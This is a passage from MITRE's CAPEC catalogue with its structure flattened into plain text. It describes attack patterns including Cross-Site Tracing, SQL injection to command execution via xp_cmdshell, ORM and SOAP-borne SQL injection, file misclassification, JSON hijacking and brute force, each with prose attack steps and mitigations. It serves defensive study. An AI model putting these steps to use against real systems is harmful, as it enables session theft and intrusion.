weakness on the site with which the victim is interacting, an attacker can get the script to come from the site that he controls and get it to execute in the victim's browser (if he can trick the victim's into visiting his malicious website or clicking on the link that he supplies). However, in that case, due to the same origin policy protection mechanism in the browser, the attackers' malicious script cannot directly issue an HTTP TRACE request to the destination system's web server because the malicious script did not originate at that domain. An attacker will then need to find a way to exploit another weakness that would enable him or her to get around the same origin policy protection. Determine if HTTP Trace is enabled Determine if HTTP Trace is enabled at the web server with which the victim has a an active session An attacker may issue an HTTP Trace request to the target web server and observe if the response arrives with the original request in the body of the response. env-Web HTTP Trace is enabled on the web server env-Web The original request is returned after the HTTP Trace request. Identify mechanism to launch HTTP Trace request The attacker attempts to force the victim to issue an HTTP Trace request to the targeted application. The attacker probes for cross-site scripting vulnerabilities to force the victim into issuing an HTTP Trace request. env-Web Attacker's script is executed within the browser context. Create a malicious script that pings the web server with HTTP TRACE request Create a malicious script that will induce the victim's browser to issue an HTTP TRACE request to the destination system's web server. The script will further intercept the response from the web server, pick up sensitive information out of it, and forward to the site controlled by the attacker. The attacker's malicious script circumvents the httpOnly cookie attribute that prevents from hijacking the victim's session cookie directly using document.cookie and instead leverages the HTTP TRACE to catch this information from the header of the HTTP request once it is echoed back from the web server in the body of the HTTP TRACE response. env-Web Execute malicious HTTP Trace launching script The attacker leverages a vulnerability to force the victim to execute the malicious HTTP Trace launching script HTTP TRACE is enabled on the web server The destination system is susceptible to XSS or an attacker can leverage some other weakness to bypass the same origin policy Scripting is enabled in the client's browser HTTP is used as the communication protocol between the server and the client Very High Medium Protocol Manipulation Injection An attacker determines that a particular system is vulnerable to reflected cross-site scripting (XSS) and endeavors to leverage this weakness to steal the victim's authentication cookie. An attacker realizes that since httpOnly attribute is set on the user's cookie, it is not possible to steal it directly with his malicious script. Instead, the attacker has his script use XMLHTTP ActiveX control in the victim's IE browser to issue an HTTP TRACE to the target system's server which has HTTP TRACE enabled. The original HTTP TRACE request contains the session cookie and so does the echoed response. The attacker picks the session cookie from the body of HTTP TRACE response and ships it to the attacker. The attacker then uses the newly acquired victim's session cookie to impersonate the victim in the target system. Medium Understanding of the HTTP protocol and an ability to craft a malicious script No specialized resources are needed Send HTTP TRACE requests to the destination web server to see if it responds Administrators should disable support for HTTP TRACE at the destination's web server. Vendors should disable TRACE by default. Patch web browser against known security origin policy bypass exploits. Confidentiality Read memory Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity Integrity Modify application data 693 Targeted 648 Targeted 1000 Attack Pattern ChildOf 86 Turn off HTTP TRACE on the web server (if not needed) Complete Mediation Secure by Default Exploitation High High Medium Client-Server All All All Jeremiah Grossman Cross-Site Tracing (XST) WhiteHat Security 2003 http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content MITRE Content Team MITRE 2013-06-21 Updated Attack_Prerequisite and Summary Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (or could be part of the functionality of the same application) fetches the injected data stored in the database and uses this data as command line arguments without performing proper validation. The malicious data escapes that data plane by spawning new commands to be executed on the host. Probe for SQL Injection vulnerability The attacker injects SQL syntax into user-controllable data inputs to search unfiltered execution of the SQL syntax in a query. Attacker receives normal response from server. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Attacker receives an error message from server indicating that there was a problem with the SQL query. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException) env-Web env-ClientServer env-Peer2Peer env-CommProtocol At least one user-controllable input susceptible to injection found. No user-controllable input susceptible to injection found. Search for and alert on unexpected SQL keywords in application logs (e.g. SELECT, DROP, etc.). Input validation of user-controlled data before including it in a SQL query Use parameterized queries (e.g. PreparedStatement in Java, and Command.Parameters.Add() to set query parameters in .NET) Achieve arbitrary command execution through SQL Injection with the MSSQL_xp_cmdshell directive The attacker leverages a SQL Injection attack to inject shell code to be executed by leveraging the xp_cmdshell directive. Attacker's injected code is executed. Disable xp_cmdshell stored procedure on the database. Search for and alert on unexpected SQL keywords in application logs (e.g. SELECT, DROP, etc.). Input validation of user-controlled data before including it in a SQL query Use parameterized queries (e.g. PreparedStatement in Java, and Command.Parameters.Add() to set query parameters in .NET) Inject malicious data in the database Leverage SQL injection to inject data in the database that could later be used to achieve command injection if ever used as a command line argument Search for and alert on unexpected SQL keywords in application logs (e.g. SELECT, DROP, etc.). Input validation of user-controlled data before including it in a SQL query Use parameterized queries (e.g. PreparedStatement in Java, and Command.Parameters.Add() to set query parameters in .NET) Trigger command line execution with injected arguments The attacker causes execution of command line functionality which leverages previously injected database content as arguments. Attacker's injected code is executed. The application does not properly validate data before storing in the database Backend application implicitly trusts the data stored in the database Malicious data is used on the backend as a command line argument Very High Low Analysis Injection SQL injection vulnerability in Cacti 0.8.6i and earlier, when register_argc_argv is enabled, allows remote attackers to execute arbitrary SQL commands via the (1) second or (2) third arguments to cmd.php. NOTE: this issue can be leveraged to execute arbitrary commands since the SQL query results are later used in the polling_items array and popen function (CVE-2006-6799). Reference: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6799 High The attacker most likely has to be familiar with the internal functionality of the system to launch this attack. Without that knowledge, there are not many feedback mechanisms to give an attacker the indication of how to perform command injection or whether the attack is succeeding. No specialized resources are required Disable MSSQL xp_cmdshell directive on the database Properly validate the data (syntactically and semantically) before writing it to the database. Do not implicitly trust the data stored in the database. Re-validate it prior to usage to make sure that it is safe to use in a given context (e.g. as a command line argument). Integrity Modify application data Confidentiality Read memory Read application data Availability DoS: crash / exit / restart DoS: instability Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code 89 Targeted 74 Secondary 20 Secondary 78 Targeted 114 Targeted 1000 Attack Pattern ChildOf 248 Validate all data syntactically and semantically before writing it to the database Do not implicitly trust database data and validate it to ensure that it is safe in the context in which it is being used Defense in Depth Least Privilege Exploitation High High High All All All All Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases An attacker leverages a weakness present in the database access layer code generated with an Object Relational Mapping (ORM) tool or a weakness in the way that a developer used a persistence framework to inject his or her own SQL commands to be executed against the underlying database. The attack here is similar to plain SQL injection, except that the application does not use JDBC to directly talk to the database, but instead it uses a data access layer generated by an ORM tool or framework (e.g. Hibernate). While most of the time code generated by an ORM tool contains safe access methods that are immune to SQL injection, sometimes either due to some weakness in the generated code or due to the fact that the developer failed to use the generated access methods properly, SQL injection is still possible. Determine Persistence Framework Used An attacker tries to determine what persistence framework is used by the application in order to leverage a weakness in the generated data access layer code or a weakness in a way that the data access layer may have been used by the developer. An attacker provides input to the application in an attempt to induce an error screen that reveals a stack trace that gives an indication of the automated data access layer used. Or an attacker may simply make some educated guesses and assume, for instance, that Hibernate is used and try to craft an attack from there. env-Web Probe for ORM Injection vulnerabilities The attacker injects ORM syntax into user-controllable data inputs of the application to determine if it is possible modify data query structure and content. Attacker receives normal response from server. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Attacker receives an error message from server indicating that there was a problem with the data query. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException) env-Web env-ClientServer env-Peer2Peer env-CommProtocol Perform SQL Injection through the generated data access layer An attacker proceeds to exploit a weakness in the generated data access methods that does not properly separate control plane from the data plan, or potentially a particular way in which developer might have misused the generated code, to modify the structure of the executed SQL queries and/or inject entirely new SQL queries. An attacker uses normal SQL injection techniques and adjusts them to reflect the type of data access layer generation framework used by the application. env-Web Attacker achieves goal of unauthorized system access, denial of service, etc. Attacker unable to exploit SQL Injection vulnerability. An application uses data access layer generated by an ORM tool or framework An application uses user supplied data in queries executed against the database The separation between data plane and control plane is not ensured, through either developer error or an underlying weakness in the data access layer code generation framework High Low Injection Analysis API Abuse When using Hibernate, it is possible to use the session.find() method to run queries against the database. This is an overloaded method that provides facilities to perform binding between the supplied user data and place holders in the statically defined query. However, it is also possible to use the session.find() method without using any of these query binding overloads, hence effectively concatenating the user supplied data with rest of the SQL query, resulting in a possibility for SQL injection. While the framework may provide mechanisms to use methods immune to SQL injections, it may also contain ways that are not immune that may be chosen by the developer. Medium Knowledge of general SQL injection techniques and subtleties of the ORM framework is needed No specialized resources are required. Provide various input to the system in an attempt to induce an error that would reveal stack trace information about the ORM layer (if any) used Remember to understand how to use the data access methods generated by the ORM tool / framework properly in a way that would leverage the built-in security mechanisms of the framework Ensure to keep up to date with security relevant updates to the persistence framework used within your application. Integrity Modify application data Availability DoS: crash / exit / restart DoS: instability Confidentiality Read memory Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code 20 Targeted 100 Targeted 89 Targeted 564 Targeted 1000 Attack Pattern ChildOf 66 Ensure that the ORM data access methods that are used by the application leverage parameter binding Defense in Depth Keep it Simple Compartmentalization Exploitation High High High Client-Server All All All OWASP Testing Guide Testing for ORM Injection (OWASP-DV-007) v4 [DRAFT] The Open Web Application Security Project (OWASP) http://www.owasp.org/index.php/Testing_for_ORM_Injection Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Evgeny Lebanidze Cigital, Inc 2009-01-12 Initial core pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content CAPEC Content Team MITRE 2013-12-18 Updated Attack_Phases CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases An attack of this type exploits a Web server's decision to take action based on filename or file extension. Because different file types are handled by different server processes, misclassification may force the Web server to take unexpected action, or expected actions in an unexpected sequence. This may cause the server to exhaust resources, supply debug or system data to the attacker, or bind an attacker to a remote process. This type of vulnerability has been found in many widely used servers including IIS, Lotus Domino, and Orion. The attacker's job in this case is straightforward, standard communication protocols and methods are used and are generally appended with malicious information at the tail end of an otherwise legitimate request. The attack payload varies, but it could be special characters like a period or simply appending a tag that has a special meaning for operations on the server side like .jsp for a java application server. The essence of this attack is that the attacker deceives the server into executing functionality based on the name of the request, i.e. login.jsp, not the contents. Footprint file input vectors Manually or using an automated tool, an attacker searches for all input locations where a user has control over the filenames or MIME types of files submitted to the web server. Attacker manually crawls application to identify file inputs env-Web Attacker uses an automated tool to crawl application identify file inputs env-Web Attacker manually assesses strength of access control protecting native application files from user control env-Web Attacker explores potential for submitting files directly to the web server via independently constructed HTTP Requests env-Web Application submits files under user control to the web server env-Web Application does not submit files under user control to the web server env-Web Application strictly protects all native application files from user control env-Web User-controllable files are identified File misclassification shotgunning An attacker makes changes to file extensions and MIME types typically processed by web servers and looks for abnormal behavior. Attacker submits files with switched extensions (e.g. .php on a .jsp file) to web server. env-Web Attacker adds extra characters (e.g. adding an extra . after the file extension) to filenames of files submitted to web server. env-Web The web server uses the wrong handler to execute the file, as expected by the attacker. env-Web No result from the web server. env-Web The web server ignore the manipulation and process the request has it should have been. env-Web Web server exhibits unexpected behavior. Monitor web server logs for excessive file processing errors Always validate that file content structure matches implicitly or explicitly declared file type as first step of processing. File misclassification sniping Understanding how certain file types are processed by web servers, an attacker crafts varying file payloads and modifies their file extension or MIME type to be that of the targeted type to see if the web server is vulnerable to misclassification of that type. Craft a malicious file payload, modify file extension to the targeted file type and submit it to the web server. env-Web Craft a malicious file payload, modify its associated MIME type to the targeted file type and submit it to the web server. env-Web The web server uses the wrong handler to execute the file, as expected by the attacker. env-Web No result from the web server. env-Web The web server ignore the manipulation and process the request has it should have been. env-Web Attacker's payload is acted on by web server. The attacker cannot get the web server to misclassify a file. Monitor web server logs for excessive file processing errors Always validate that file content structure matches implicitly or explicitly declared file type as first step of processing. Disclose information The attacker, by manipulating a file extension or MIME type is able to make the web server return raw information (not executed). Manipulate the file names that are explicitly sent to the server. env-Web Manipulate the MIME sent in order to confuse the web server. env-Web The attacker gets the information from the server Always validate that file content structure matches implicitly or explicitly declared file type as first step of processing. Web server software must rely on file name or file extension for processing. High Medium Injection Modification of Resources J2EE application servers are supposed to execute Java Server Pages (JSP). There have been disclosure issues relating to Orion Application Server, where an attacker that appends either a period (.) or space characters to the end of a legitimate Http request, then the server displays the full source code in the attackers' web browser. http://victim.site/login.jsp. Since remote data and directory access may be accessed directly from the JSP, this is a potentially very serious issue. [R.11.2] Low To modify file name or file extension Medium To use misclassification to force the Web server to disclose configuration information, source, or binary data Ability to execute HTTP request to Web server Implementation: Server routines should be determined by content not determined by filename or file extension. Confidentiality Read memory Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity Malicious input delivered through standard Web application calls, e.g. HTTP Request. Varies with instantiation of attack pattern. Malicious payload may alter or append filename or extension to communicate with processes in unexpected order. Client machine and client network Enables attacker to force web server to disclose configuration, source, and data 69 Secondary 77 Secondary 1000 Attack Pattern ChildOf 165 1000 Attack Pattern ChildOf 266 Reconnaissance High Low Low All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Orion Application Server JSP Source Disclosure Vulnerability (Bugtraq ID: 17204) SecurityFocus Mar 23 2006 http://www.securityfocus.com/bid/17204/info [R.11.1][REF-2] Cigital, Inc 2007-01-01 [R.11.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2014-02-06 Updated Examples-Instances An attacker modifies the parameters of the SOAP message that is sent from the service consumer to the service provider to initiate a SQL injection attack. On the service provider side, the SOAP message is parsed and parameters are not properly validated before being used to access a database in a way that does not use parameter binding, thus enabling the attacker to control the structure of the executed SQL query. This pattern describes a SQL injection attack with the delivery mechanism being a SOAP message. Detect Incorrect SOAP Parameter Handling The attacker tampers with the SOAP message parameters and looks for indications that the tampering caused a change in behavior of the targeted application. The attacker tampers with the SOAP message parameters by injecting some special characters such as single quotes, double quotes, semi columns, etc. The attacker observes system behavior. env-Web SOAP messages are used as a communication mechanism in the system env-Web Any indication that the injected input is causing system trouble (e.g. stack traces are produced, the system does not respond, etc.) then the attacker may come to conclude that the system is vulnerable to SQL injection through SOAP parameter tampering. Probe for SQL Injection vulnerability The attacker injects SQL syntax into vulnerable SOAP parameters identified during the Explore phase to search for unfiltered execution of the SQL syntax in a query. Attacker receives normal response from server. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Attacker receives an error message from server indicating that there was a problem with the SQL query. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Server sends a specific error message that indicates programmatic parsing of the input data (e.g. NumberFormatException) env-Web env-ClientServer env-Peer2Peer env-CommProtocol At least one SOAP parameter susceptible to injection found. No SOAP parameter susceptible to injection found. Search for and alert on unexpected SQL keywords in application logs (e.g. SELECT, DROP, etc.). Input validation of SOAP parameter data before including it in a SQL query Use parameterized queries (e.g. PreparedStatement in Java, and Command.Parameters.Add() to set query parameters in .NET) Inject SQL via SOAP Parameters The attacker injects SQL via SOAP parameters identified as vulnerable during Explore phase to launch a first or second order SQL injection attack. An attacker performs a SQL injection attack via the usual methods leveraging SOAP parameters as the injection vector. An attacker has to be careful not to break the XML parser at the service provider which may prevent the payload getting through to the SQL query. The attacker may also look at the WSDL for the web service (if available) to better understand what is expected by the service provider. env-Web Attacker achieves goal of unauthorized system access, denial of service, etc. Attacker unable to exploit SQL Injection vulnerability. SOAP messages are used as a communication mechanism in the system SOAP parameters are not properly validated at the service provider The service provider does not properly utilize parameter binding when building SQL queries Very High High Injection Analysis An attacker uses a travel booking system that leverages SOAP communication between the client and the travel booking service. An attacker begins to tamper with the outgoing SOAP messages by modifying their parameters to include characters that would break a dynamically constructed SQL query. He notices that the system fails to respond when these malicious inputs are injected in certain parameters transferred in a SOAP message. The attacker crafts a SQL query that modifies his payment amount in the travel system's database and passes it as one of the parameters . A backend batch payment system later fetches the payment amount from the database (the modified payment amount) and sends to the credit card processor, enabling the attacker to purchase the airfare at a lower price. An attacker needs to have some knowledge of the system's database, perhaps by exploiting another weakness that results in information disclosure. Medium If the attacker is able to gain good understanding of the system's database schema High If the attacker has to perform SQL injection blindly No specialized hardware resources are required Inject SQL characters in SOAP parameters and observe system behavior Review WSDL to understand what is expected by the service provider Properly validate and sanitize/reject user input at the service provider. Ensure that prepared statements or other mechanism that enables parameter binding is used when accessing the database in a way that would prevent the attackers' supplied data from controlling the structure of the executed query. At the database level, ensure that the database user used by the application in a particular context has the minimum needed privileges to the database that are needed to perform the operation. When possible, run queries against pre-generated views rather than the tables directly. Integrity Modify application data Availability Unexpected State Confidentiality Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code 89 Targeted 20 Secondary 1000 Attack Pattern ChildOf 66 1000 Attack Pattern ChildOf 7 1000 Attack Pattern ChildOf 280 Always safely access the database through prepared statements that leverage parameter binding Properly validate all SOAP parameters to ensure that their values are as expected Reject bad user input (do not try to sanitize it) Defense in Depth Least Privilege Remember that the client can be made invisible Exploitation High High High SOA All All All Evgeny Lebanidze Cigital, Inc 2008-01-12 Initial core pattern content Evgeny Lebanidze Cigital, Inc 2008-01-12 Initial core pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content MITRE Content Team MITRE 2013-06-21 Updated Skill_or_Knowledge_Level and Skill_or_Knowledge_Type Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Examples-Instances, Solutions_and_Mitigations An attacker targets a system that uses JavaScript Object Notation (JSON) as a transport mechanism between the client and the server (common in Web 2.0 systems using AJAX) to steal possibly confidential information transmitted from the server back to the client inside the JSON object by taking advantage of the loophole in the browser's Same Origin Policy that does not prohibit JavaScript from one website to be included and executed in the context of another website. An attacker gets the victim to visit his or her malicious page that contains a script tag whose source points to the vulnerable system with a URL that requests a response from the server containing a JSON object with possibly confidential information. The malicious page also contains malicious code to capture the JSON object returned by the server before any other processing on it can take place, typically by overriding the JavaScript function used to create new objects. This hook allows the malicious code to get access to the creation of each object and transmit the possibly sensitive contents of the captured JSON object to the attackers' server. There is nothing in the browser's security model to prevent the attackers' malicious JavaScript code (originating from attacker's domain) to set up an environment (as described above) to intercept a JSON object response (coming from the vulnerable target system's domain), read its contents and transmit to the attackers' controlled site. The same origin policy protects the domain object model (DOM), but not the JSON. Understand How to Request JSON Responses from the Target System An attacker first explores the target system to understand what URLs need to be provided to it in order to retrieve JSON objects that contain information of interest to the attacker. An attacker creates an account with the target system and observes requests and the corresponding JSON responses from the server. Understanding how to properly elicit responses from the server is crucial to the attackers' ability to craft the exploit. env-Web Targeted application leverages JSON in its architecture. env-Web Craft a malicious website The attacker crafts a malicious website to which he plans to lure the victim who is using the vulnerable target system. The malicious website does two things: 1. Contains a hook that intercepts incoming JSON objects, reads their contents and forwards the contents to the server controlled by the attacker (via a new XMLHttpRequest). 2. Uses the script tag with a URL in the source that requests a JSON object from the vulnerable target system. Once the JSON object is transmitted to the victim's browser, the malicious code (as described in step 1) intercepts that JSON object, steals its contents, and forwards to the attacker. This attack step leverages the fact that the same origin policy in the browser does not protect JavaScript originating from one domain from setting up an environment to intercept and access JSON objects arriving from a completely different domain. The JSON object hook captures, reads and forwards JSON objects The malicious website effectively requests JSON objects from the target system Launch JSON hijack An attacker lures the victim to the malicious website or leverages other means to get his malicious code executing in the victim's browser. Once that happens, the malicious code makes a request to the victim target system to retrieve a JSON object with sensitive information. The request includes the victim's session cookie if the victim is logged in. An attacker employs a myriad of standard techniques to get the victim to visit his or her malicious site or by some other means get the attackers' malicious code executing in the victim's browser. env-Web The sensitive contents of captured JSON objects are readable by the attacker. JSON is used as a transport mechanism between the client and the server The target server cannot differentiate real requests from forged requests The JSON object returned from the server can be accessed by the attackers' malicious code via a script tag High High Protocol Manipulation Analysis Spoofing Gmail service was found to be vulnerable to a JSON Hijacking attack that enabled an attacker to get the contents of the victim's address book. An attacker could send an e-mail to the victim's Gmail account (which ensures that the victim is logged in to Gmail when he or she receives it) with a link to the attackers' malicious site. If the victim clicked on the link, a request (containing the victim's authenticated session cookie) would be sent to the Gmail servers to fetch the victim's address book. This functionality is typically used by the Gmail service to get this data on the fly so that the user can be provided a list of contacts from which to choose the recipient of the e-mail. When the JSON object with the contacts came back, it was loaded into the JavaScript space via a script tag on the attackers' malicious page. Since the JSON object was never assigned to a local variable (which would have prevented a script from a different domain accessing it due to the browser's same origin policy), another mechanism was needed to access the data that it contained. That mechanism was overwriting the internal array constructor with the attackers' own constructor in order to gain access to the JSON object's contents. These contents could then be transferred to the site controlled by the attacker. Medium Once this attack pattern is developed and understood, creating an exploit is not very complex. No specialized hardware resources are required. The attacker needs to have knowledge of the URLs that need to be accessed on the target system to request the JSON objects. Examine the typical asynchronous requests and responses between an AJAX client and the server to see how JSON objects are requested and what is returned. Ensure that server side code can differentiate between legitimate requests and forged requests. The solution is similar to protection against Cross Site Request Forger (CSRF), which is to use a hard to guess random nonce (that is unique to the victim's session with the server) that the attacker has no way of knowing (at least in the absence of other weaknesses). Each request from the client to the server should contain this nonce and the server should reject all requests that do not contain the nonce. On the client side, the system's design could make it difficult to get access to the JSON object content via the script tag. Since the JSON object is never assigned locally to a variable, it cannot be readily modified by the attacker before being used by a script tag. For instance, if while(1) was added to the beginning of the JavaScript returned by the server, trying to access it with a script tag would result in an infinite loop. On the other hand, legitimate client side code can remove the while(1) statement after which the JavaScript can be evaluated. A similar result can be achieved by surrounding the returned JavaScript with comment tags, or using other similar techniques (e.g. wrapping the JavaScript with HTML tags). Make the URLs in the system used to retrieve JSON objects unpredictable and unique for each user session. Ensure that to the extent possible, no sensitive data is passed from the server to the client via JSON objects. JavaScript was never intended to play that role, hence the same origin policy does not adequate address this scenario. Confidentiality Read application data 345 Targeted 346 Targeted 352 Targeted 1000 Attack Pattern ChildOf 184 1000 Attack Pattern ChildOf 116 Ensure that a mechanism is in place for the server side code to differentiate between legitimate requests and forged requests On the client side, ensure that the returned JavaScript from the server can only be evaluated locally after being assigned to a variable and not via a script tag Ensure that URLs used to request server responses that pass the JSON objects back to the client are hard to guess and are unique per user session Do not pass confidential information in JSON objects Exploitation High Low Low Client-Server All All AJAX Evgeny Lebanidze Cigital, Inc 2008-01-12 Initial core pattern content Evgeny Lebanidze Cigital, Inc 2008-01-12 Initial core pattern content Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content MITRE Content Team MITRE 2013-06-21 Updated Attack_Step_Description, Example-Instance_Description, Solution_or_Mitigation, and Summary Sean Barnum Cigital Federal, Inc. 2009-04-20 Refinement of pattern content CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Solutions_and_Mitigations In this attack, some asset (information, functionality, identity, etc.) is protected by a finite secret value. The attacker attempts to gain access to this asset by using trial-and-error to exhaustively explore all the possible secret values in the hope of finding the secret (or a value that is functionally equivalent) that will unlock the asset. Examples of secrets can include, but are not limited to, passwords, encryption keys, database lookup keys, and initial values to one-way functions. The key factor in this attack is the attackers' ability to explore the possible secret space rapidly. This, in turn, is a function of the size of the secret space and the computational power the attacker is able to bring to bear on the problem. If the attacker has modest resources and the secret space is large, the challenge facing the attacker is intractable. While the defender cannot control the resources available to an attacker, they can control the size of the secret space. Creating a large secret space involves selecting one's secret from as large a field of equally likely alternative secrets as possible and ensuring that an attacker is unable to reduce the size of this field using available clues or cryptanalysis. Doing this is more difficult than it sounds since elimination of patterns (which, in turn, would provide an attacker clues that would help them reduce the space of potential secrets) is difficult to do using deterministic machines, such as computers. Assuming a finite secret space, a brute force attack will eventually succeed. The defender must rely on making sure that the time and resources necessary to do so will exceed the value of the information. For example, a secret space that will likely take hundreds of years to explore is likely safe from raw-brute force attacks. Determine secret testing procedure Determine how a potential guess of the secret may be tested. This may be accomplished by comparing some manipulation of the secret to a known value, use of the secret to manipulate some known set of data and determining if the result displays specific characteristics (for example, turning cryptotext into plaintext), or by submitting the secret to some external authority and having the external authority respond as to whether the value was the correct secret. Ideally, the attacker will want to determine the correctness of their guess independently since involvement of an external authority is usually slower and can provide an indication to the defender that a brute-force attack is being attempted. Determine if there is a way to parallelize the attack. Most brute force attacks can take advantage of parallel techniques by dividing the search space among available resources, thus dividing the average time to success by the number of resources available. If there is a single choke point, such as a need to check answers with an external authority, the attackers' position is significantly degraded. env-All Reduce search space Find ways to reduce the secret space. The smaller the attacker can make the space they need to search for the secret value, the greater their chances for success. There are a great many ways in which the search space may be reduced. If possible, determine how the secret was selected. If the secret was determined algorithmically (such as by a random number generator) the algorithm may have patterns or dependencies that reduce the size of the secret space. If the secret was created by a human, behavioral factors may, if not completely reduce the space, make some types of secrets more likely than others. (For example, humans may use the same secrets in multiple places or use secrets that look or sound familiar for ease of recall.) env-All If the secret was chosen algorithmically, cryptanalysis can be applied to the algorithm to discover patterns in this algorithm. (This is true even if the secret is not used in cryptography.) Periodicity, the need for seed values, or weaknesses in the generator all can result in a significantly smaller secret space. env-All If the secret was chosen by a person, social engineering and simple espionage can indicate patterns in their secret selection. If old secrets can be learned (and a target may feel they have little need to protect a secret that has been replaced) hints as to their selection preferences can be gleaned. These can include character substitutions a target employs, patterns in sources (dates, famous phrases, music lyrics, family members, etc.). Once these patterns have been determined, the initial efforts of a brute-force attack can focus on these areas. env-All Some algorithmic techniques for secret selection may leave indicators that can be tested for relatively easily and which could then be used to eliminate large areas of the search space for consideration. For example, it may be possible to determine that a secret does or does not start with a given character after a relatively small number of tests. Alternatively, it might be possible to discover the length of the secret relatively easily. These discoveries would significantly reduce the search space, thus increasing speed with which the attacker discovers the secret. env-All Expand victory conditions It is sometimes possible to expand victory conditions. For example, the attacker might not need to know the exact secret but simply needs a value that produces the same result using a one-way function. While doing this does not reduce the size of the search space, the presence of multiple victory conditions does reduce the likely amount of time that the attacker will need to explore the space before finding a workable value. Gather information so attack can be performed independently. If possible, gather the necessary information so a successful search can be determined without consultation of an external authority. This can be accomplished by capturing cryptotext (if the goal is decoding the text) or the encrypted password dictionary (if the goal is learning passwords). The attacker must be able to determine when they have successfully guessed the secret. As such, one-time pads are immune to this type of attack since there is no way to determine when a guess is correct. High Brute Force Low The attack simply requires basic scripting ability to automate the exploration of the search space. More sophisticated attackers may be able to use more advanced methods to reduce the search space and increase the speed with which the secret is located. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources the attacker has at their disposal. This attack method is resource expensive: having large amounts of computational power do not guarantee timely success, but having only minimal resources makes the problem intractable against all but the weakest secret selection procedures. Repeated submissions of incorrect secret values may indicate a brute force attack. For example, repeated bad passwords when accessing user accounts or repeated queries to databases using non-existent keys. Attempts to download files protected by secrets (usually using encryption) may be a precursor to an offline attack to break the file's encryption and read its contents. This is especially significant if the file itself contains other secret values, such as password files. If the attacker is able to perform the checking offline then there will likely be no indication that an attack is ongoing. The attack is impossible to detect if the attacker can test for successful discovery of the secret value independently, without needing to consult an external authority. If an external authority must be consulted, the attacker can attempt to space out their guesses to avoid a large number of failed guesses in a short period of time, but doing so slows the attack to the point of making it unworkable against all but the most trivial secret spaces. As such, if an external authority must be consulted the attacked is unlikely to be able to keep the attack secret. Select a provably large secret space for selection of the secret. Provably large means that the procedure by which the secret is selected does not have artifacts that significantly reduce the size of the total secret space. Do not provide the means for an attacker to determine success independently. This forces the attacker to check their guesses against an external authority, which can slow the attack and warn the defender. This mitigation may not be possible if testing material must appear externally, such as with a transmitted cryptotext. Confidentiality Read application data Confidentiality Access_Control Authorization Gain privileges / assume identity 330 Secondary 326 Secondary 521 Secondary 1000 Category ChildOf 223 333 Category HasMember 344 Protect sensitive data, even when the data is encrypted. If an attacker can gain access to encrypted data, they can mount a brute-force attack independently. The defender will not be aware of this attack or be able to do anything about it and at that point it is purely a function of the attackers' available resources as to how long it takes them to learn the secret. Monitor activity logs for suspicious activity. An attacker that must use an external authority to check their brute-force guesses is easy to detect, but only if that external authority is monitoring activity and detects the abnormally large number of failed guesses. Do not assume secrets will protect sensitive data in the long-term Monitor systems for suspicious activity. Penetration CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Description Summary, Relevant_Security_Requirements An attacker manipulates the processing of Application Programming Interface (API) resulting in the API's function having an adverse impact upon the security of the system or application implementing the API. This can allow the attacker to execute functionality not intended by the API implementation, possibly compromising the system or application which integrates the API. API Abuse can take on a number of forms. For example, the API may trust that the calling function properly validates its data and thus it may be manipulated by 